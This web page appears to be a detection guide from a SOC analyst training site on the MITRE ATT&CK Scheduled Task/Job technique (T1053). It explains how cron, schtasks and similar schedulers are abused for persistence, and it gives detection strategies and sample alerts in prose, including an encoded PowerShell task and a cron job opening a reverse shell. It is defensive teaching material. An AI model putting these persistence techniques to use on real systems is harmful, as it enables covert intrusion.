Scheduled Task/Job (T1053) is a MITRE ATT&CK technique in the Execution tactic. SOC analysts detect it by monitoring for XDR, SIEM events, behavioral anomalies, and the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication credentials are used to authenticate to the remote system. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote execution as part of lateral movement, or to run a process under the context of a specified account. On Windows, schtasks.exe and the Task Scheduler service provide scheduling capabilities. On Unix-based systems, cron, at, and launchd serve similar purposes. Scheduled tasks are attractive to attackers because they survive reboots, run with elevated privileges depending on configuration, and blend in with legitimate administrative task scheduling.
“Scheduled Task/Job is documented as technique T1053 in the MITRE ATT&CK knowledge base under the Execution tactic. Detection requires visibility into XDR, SIEM telemetry.”
The following detection strategies help SOC analysts identify Scheduled Task/Job activity. These methods apply across XDR, SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.
Monitor schtasks.exe and at.exe process creation events, particularly those creating tasks that run at system startup, execute from unusual paths, or use obfuscated command line arguments including encoded PowerShell.
Audit the Windows Task Scheduler registry keys and XML task definitions for recently created or modified tasks, focusing on tasks using SYSTEM or Administrator accounts and tasks pointing to executable paths in user-writable locations.
Monitor cron file modifications on Linux systems using file integrity monitoring, alerting on changes to /etc/crontab, /etc/cron.d/, user crontabs, and /etc/rc.local which are commonly abused for persistence.
Correlate scheduled task creation events with user authentication events to identify tasks created immediately after suspicious logins or during known attack timeframes identified through incident response.
Alert on scheduled tasks executing PowerShell or cmd.exe with encoded arguments, or tasks that download content from the internet using certutil, bitsadmin, or curl as these patterns indicate malicious use.
These realistic alert examples show what Scheduled Task/Job looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.
New scheduled task created via schtasks.exe named "WindowsUpdateHelper" configured to run at system startup. The task executes PowerShell with an encoded command from a file in %AppData%\Local\Temp. This naming convention and execution pattern is consistent with persistence mechanisms used by multiple commodity malware families.
Scheduled task fired and executed powershell.exe with -EncodedCommand flag. Decoded payload retrieves a remote script from a CDN domain and executes it in memory without writing to disk. The task was created 6 days ago by an account that has not logged in since, suggesting it was created during a previous compromise that was partially remediated.
File integrity monitoring detected modification to /etc/cron.d/ on a production web server. New cron entry executes a bash script from /tmp/.hidden every 5 minutes. The script establishes a reverse shell connection to an external IP address. The modification timestamp matches a period of unusual SSH authentication activity from an Asian IP address block.
SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Scheduled Task/Job. Build detection skills with zero consequences — free forever.
An Indicator of Compromise (IOC) is an observable artifact, such as a file hash, IP address, domain name, URL, registry …
Read more GlossaryEndpoint Detection and Response (EDR) is a security technology that continuously monitors endpoint activity, recording p…
Read more GlossaryAlert triage is the structured process of reviewing, prioritizing, and investigating security alerts to determine their …
Read more GlossaryTactics, Techniques, and Procedures (TTPs) describe the behavioral patterns, methods, and operational processes threat a…
Read more Career PathTier 2 SOC Analysts handle the investigations that Tier 1 escalates. You dig into multi-stage attacks, coordinate contai…
Read more Career PathIncident Responders lead the technical response when confirmed breaches happen. You coordinate containment, run forensic…
Read more ToolThe XDR console in SOCSimulator replicates the investigation workflow of platforms like CrowdStrike Falcon, Microsoft De…
Read more ToolThe SIEM console in SOCSimulator replicates the workflow of enterprise platforms like Splunk Enterprise Security, Micros…
Read more ComparisonSOCSimulator wins on operational realism. You get multi-tool shift simulation with SLA pressure, noise injection, and al…
Read more ComparisonSOCSimulator is the better tool for dedicated SOC analyst preparation. TryHackMe is the better tool for broad cybersecur…
Read more GlossaryComplete glossary of Security Operations Center terminology for aspiring SOC analysts.
Read more FeaturePractice alert triage under realistic time pressure with SLA timers and noise injection.
Read moreWe use cookies to improve your experience and measure usage. Learn more